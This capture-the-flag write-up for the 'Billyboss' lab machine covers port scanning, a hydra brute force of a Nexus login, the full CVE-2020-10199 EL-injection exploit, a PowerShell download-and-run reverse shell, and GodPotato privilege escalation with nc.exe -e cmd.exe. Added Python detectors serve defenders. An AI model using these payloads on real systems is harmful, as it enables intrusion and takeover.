Billyboss
Enumeration:
Port Scanning:
As always we are going to start with port scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 12:09 EST
Nmap scan report for 192.168.182.61
Host is up, received echo-reply ttl 125 (0.11s latency).
Scanned at 2025-11-10 12:09:20 EST for 198s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8081/tcp open http syn-ack ttl 125 Jetty 9.4.18.v20190429
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-title: Nexus Repository Manager
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
We have FTP running on port 21, HTTP on ports 80 and 8081, and SMB on port 445.
HTTP (80):

We can play with the search, upload and push functionality, but that is not the way in:

HTTP (8081):

Here we have Sonatype Nexus Repository Manager running.
I searched for public exploits for this specific service:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit Sonatype Nexus
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py
Sonatype Nexus Repository 3.53.0-01 - Path Traversal | multiple/webapps/52101.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
We have an RCE exploit for 3.21.1, a version close to ours (3.21.0-05) but slightly newer; the exploit states that 3.21.1 and below are vulnerable, so ours is in range.
As the title says, it is authenticated, so we need to log in first.

I tried a lot of default credentials and searched online for default credentials specific to this service, but could not log in. I finally used nexus:nexus and:

Alternatively, we can use cewl to harvest keywords from that page and brute-force the login form with hydra.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
nexus
repository
manager
loading
form
history
browse
spinner
logo
product
oss
ico
favicon
resources
rapture
static
http
src
image
new
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cewl http://192.168.182.61:8081/ --lowercase > words.txt
We can get the endpoint of the login request and its parameters through Burp Suite, or just as easily with the browser developer tools under Network:


We will notice that the username and password are base64-encoded.
Let's build our command and run it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ hydra -L words.txt -P words.txt 192.168.182.61 http-post-form -s 8081 '/service/rapture/session:username=^USER64^&password=^PASS64^:F=403' -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these
*** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-10 12:37:26
[DATA] max 16 tasks per 1 server, overall 16 tasks, 441 login tries (l:21/p:21), ~28 tries per task
[DATA] attacking http-post-form://192.168.182.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=403
[8081][http-post-form] host: 192.168.182.61 login: nexus password: nexus
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-10 12:37:51
We will find the same result.
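Seen from the blue side, this step is noisy: hydra fires hundreds of POSTs at /service/rapture/session and treats a 403 as a failed try, while the exploit script below expects a 204 on a valid login. As an added example (not part of this writeup), here is a small detector that runs over access-log lines, flags any client that piles up failed logins on that path inside a sliding window, and notes whether the same client later got a 204. The log lines are constructed samples in a combined-log style, not a real capture.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/service/rapture/session"
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Combined-log-style access line: ip ident user [timestamp] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed (403) logins inside any `window`.

    Returns {ip: {"failures": total_403s, "success_after": bool}}; success_after is
    set when a flagged client later gets a 204 (a valid login) on the same path.
    """
    recent = defaultdict(deque)  # ip -> timestamps of 403s inside the sliding window
    total = Counter()            # ip -> all 403s seen for that client
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 403:
            total[ip] += 1
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                flagged.setdefault(ip, {"failures": 0, "success_after": False})
        elif rec["status"] == 204 and ip in flagged:
            flagged[ip]["success_after"] = True
    for ip in flagged:
        flagged[ip]["failures"] = total[ip]
    return flagged


def constructed_log():
    """Constructed sample lines (not a real capture): a 25-try burst from 10.0.0.5
    that ends in a 204, two stray failures from 10.0.0.9, and unrelated traffic."""
    lines = ['10.0.0.9 - - [10/Nov/2025:12:36:58 -0500] "GET / HTTP/1.1" 200 9921']
    for i in range(25):
        lines.append(f'10.0.0.5 - - [10/Nov/2025:12:37:{26 + i:02d} -0500] "POST {LOGIN_PATH} HTTP/1.1" 403 0')
    lines.append(f'10.0.0.5 - - [10/Nov/2025:12:37:51 -0500] "POST {LOGIN_PATH} HTTP/1.1" 204 0')
    lines.append(f'10.0.0.9 - - [10/Nov/2025:12:38:00 -0500] "POST {LOGIN_PATH} HTTP/1.1" 403 0')
    lines.append(f'10.0.0.9 - - [10/Nov/2025:12:38:05 -0500] "POST {LOGIN_PATH} HTTP/1.1" 403 0')
    return lines


if __name__ == "__main__":
    for ip, info in find_bruteforce(constructed_log()).items():
        print(f"{ip}: {info['failures']} failed logins, later succeeded: {info['success_after']}")
```

The threshold and window are tuning knobs; the point is that a valid login arriving right after a burst of failures from the same client is the event worth paging on, not the failures alone.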
Exploitation:
Now let's pull the exploit, adjust it to our target, and execute it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ searchsploit -m java/webapps/49385.py
Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49385
Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
Codes: CVE-2020-10199
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Billyboss/49385.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat 49385.py
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
import sys
import base64
import requests

URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'

s = requests.Session()

print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)
What we edit are the credentials, the target URL, and finally the command to run:
<snipped>
URL='http://192.168.182.61:8081'
CMD='powershell -c IEX(IWR -UseBasicParsing -Uri http://192.168.45.187:8000/shell.ps1)'
USERNAME='nexus'
PASSWORD='nexus'
<snipped>
Serve our shell.ps1 file with Python's built-in web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.187',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Start a netcat listener as well:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
Execute our script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ python3 49385.py
Logging in
Logged in successfully
Command executed
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50251
PS C:\Users\nathan\Nexus\nexus-3.21.0-05>
Here we have a shell.
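Two things made this step possible: an instance still in the affected version range, and the repository REST API accepting an EL expression inside a group member name. As an added example (not from this writeup and not Nexus code), here is a triage helper a defender could run over a proxy or WAF capture: it reads the version out of the Server header exactly as nmap showed it, compares it with the range the exploit header states (3.21.1 and below; I assume everything above that is fixed), and flags EL syntax in any string posted to the repositories API, which is where the memberNames payload goes. The request bodies are constructed samples with a harmless expression in place of a command.

```python
import json
import re

# Version string as nmap showed it in the Server header: "Nexus/3.21.0-05 (OSS)"
SERVER_RE = re.compile(r"Nexus/(\d+)\.(\d+)\.(\d+)")
# Last affected release per the exploit header above (3.21.1 and below); assumed fixed after it.
LAST_AFFECTED = (3, 21, 1)
# EL expression openers: "${", "#{" and the "$\A{" spelling the exploit's payload uses.
EL_RE = re.compile(r"[$#]\\?\w?\{")
# Prefix of the repository management REST API the exploit posts to (assumed).
REPO_API_PREFIX = "/service/rest/"


def nexus_version(server_header):
    """(major, minor, patch) from a Server header, or None if it is not Nexus."""
    m = SERVER_RE.search(server_header or "")
    return tuple(int(g) for g in m.groups()) if m else None


def is_affected(server_header):
    """True when the advertised version is 3.21.1 or below."""
    v = nexus_version(server_header)
    return v is not None and v <= LAST_AFFECTED


def _strings(obj):
    """Yield every string value nested anywhere in a decoded JSON document."""
    if isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)
    elif isinstance(obj, str):
        yield obj


def el_markers(body):
    """Return the string values in a JSON body that open an EL expression."""
    data = json.loads(body) if isinstance(body, str) else body
    return [s for s in _strings(data) if EL_RE.search(s)]


def triage(server_header, method, path, body):
    """Combine both checks for one captured request."""
    hits = []
    if method == "POST" and path.startswith(REPO_API_PREFIX) and "/repositories/" in path:
        hits = el_markers(body)
    return {"affected_version": is_affected(server_header), "el_payload": hits}


# Constructed sample bodies, same shape as the exploit's request; the suspect one
# carries a harmless expression rather than a command.
BENIGN_BODY = json.dumps({
    "name": "internal", "online": True,
    "storage": {"blobStoreName": "default", "strictContentTypeValidation": True},
    "group": {"memberNames": ["go-proxy"]},
})
SUSPECT_BODY = json.dumps({
    "name": "internal", "online": True,
    "storage": {"blobStoreName": "default", "strictContentTypeValidation": True},
    "group": {"memberNames": ["$\\A{7*7}"]},
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(label, triage("Nexus/3.21.0-05 (OSS)", "POST",
                            "/service/rest/beta/repositories/go/group", body))
```

The version check is the one that matters for an inventory sweep; the body check is only useful where request bodies are logged, and it deliberately keys on the expression syntax rather than on any particular command so a reworded payload still trips it.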
Post-Exploitation:
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Here again we have SeImpersonatePrivilege, so let's upload GodPotato and nc to the target:
PS C:\Windows\Tasks> curl http://192.168.45.187:8000/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> curl http://192.168.45.187:8000/nc.exe -o nc.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2025 9:42 AM 57344 GodPotato-NET4.exe
-a---- 11/10/2025 9:42 AM 59392 nc.exe
Start another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
Run GodPotato:
PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.187 80"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\f13a5021-5994-436a-820a-c28f5c614f1c\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-1020-ffff-55e0-c644c9a86527
[*] DCOM obj OXID: 0xbf0a166078ef8da5
[*] DCOM obj OID: 0x35b17bd2aed74d00
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x764 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1508
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Billyboss]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.61] 50266
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>set username
USERNAME=BILLYBOSS$
C:\Windows\system32>hostname
billyboss
Here we have a shell as SYSTEM.
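On the defending side, the thing to audit after a box like this is the context the web application was running in: a service account holding an impersonation privilege is exactly what GodPotato needs. As an added example (not from this writeup and not part of GodPotato), here is a parser for the text format `whoami /all` prints, which reports whether the account is in the SERVICE group and holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The sample dump is a constructed copy of the output captured above.

```python
import re

# Privileges the Potato family needs to turn a service context into SYSTEM.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
SECTIONS = ("USER INFORMATION", "GROUP INFORMATION", "PRIVILEGES INFORMATION")
# "<name> <type> <SID> <attributes>" rows of the GROUP INFORMATION table.
GROUP_RE = re.compile(r"(.+?)\s+(Well-known group|Alias|Group|Label|User)\s+(S-[\d-]+)")

# Constructed sample, copied from the whoami /all output above (raw string keeps the backslashes).
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------
User Name SID
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
"""


def parse_whoami_all(text):
    """Parse the three sections of `whoami /all` into a dict."""
    report = {"user": None, "groups": [], "integrity": None, "privileges": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if set(line) <= {"-", "=", " "}:  # underline rows of each table
            continue
        if section == "USER INFORMATION":
            if not line.startswith("User Name"):
                report["user"] = line.split()[0]
        elif section == "GROUP INFORMATION":
            m = GROUP_RE.match(line)
            if not m or line.startswith("Group Name"):
                continue
            name, kind, _sid = m.groups()
            if kind == "Label":
                report["integrity"] = name
            else:
                report["groups"].append(name)
        elif section == "PRIVILEGES INFORMATION":
            if not line.startswith("Privilege Name"):
                parts = line.split()  # first token is the privilege, last is its state
                report["privileges"][parts[0]] = parts[-1]
    return report


def impersonation_risk(report):
    """Is this a service context holding an enabled impersonation privilege?"""
    enabled = {p for p, state in report["privileges"].items() if state == "Enabled"}
    held = sorted(enabled & IMPERSONATION_PRIVS)
    as_service = "NT AUTHORITY\\SERVICE" in report["groups"]
    return {
        "user": report["user"],
        "running_as_service": as_service,
        "impersonation_privileges": held,
        "token_impersonation_risk": as_service and bool(held),
    }


if __name__ == "__main__":
    print(impersonation_risk(parse_whoami_all(SAMPLE_WHOAMI)))
```

Windows hands SeImpersonatePrivilege to every service through the SERVICE group, so the fix is rarely to strip the privilege; it is to keep the RCE out (patch Nexus, no default credentials) and to run the application under the least-privileged dedicated account it actually needs, so that a foothold in it is not one tool away from SYSTEM.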
Get the flags:
C:\Windows\system32>type C:\Users\nathan\Desktop\local.txt
3a0141572f8eeb4591587a7616f7c54c
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
27da912b734bca4feaf77d4142d40bb1